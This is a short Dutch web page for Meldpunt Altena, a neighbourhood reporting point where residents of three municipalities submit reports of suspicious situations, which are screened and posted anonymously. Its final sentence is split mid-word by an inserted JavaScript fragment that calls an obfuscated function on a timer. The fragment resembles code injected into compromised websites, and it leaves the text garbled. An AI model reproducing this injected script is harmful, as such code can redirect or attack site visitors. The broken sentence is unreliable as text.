Meldpunt Altena

Correct beveiliging draagt bij aan een veiligere samenleving. Dit doen wij actief door het beveiligen van objecten. Wij kunnen dit echter niet alleen. Inwoners zijn de oren en ogen van een wijk of buurt. Iedereen maakt weleens in zijn of haar omgeving een onveilige of verdachte situatie mee. Daarom is het initiatief Meldpunt Altena gestart. Ook door een melding te maken, en deze te delen via sociale media, kunnen we samen zorgen voor een veiligere leefomgeving in de regio Altena.

Doe een melding

Door informatie te verzamelen en te delen is het mogelijk om in samenwerking met de gemeentes en de politie aan een veiligere omgeving te werken. Meldpunt Altena is actief in de gemeentes Aalburg, Werkendam en Woudrichem.

Om een melding te doen voert u zo specifiek mogelijk in wat u ziet of hoort. Vul hierbij ook uw persoonlijke gegevens in. Wanneer u een melding heeft geplaatst wordt deze door Meldpunt Altena gescreend en op de website geplaatst.

Uw gegevens worden vertrouwelijk behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeld en uw melding wordt anoniem geplaatst.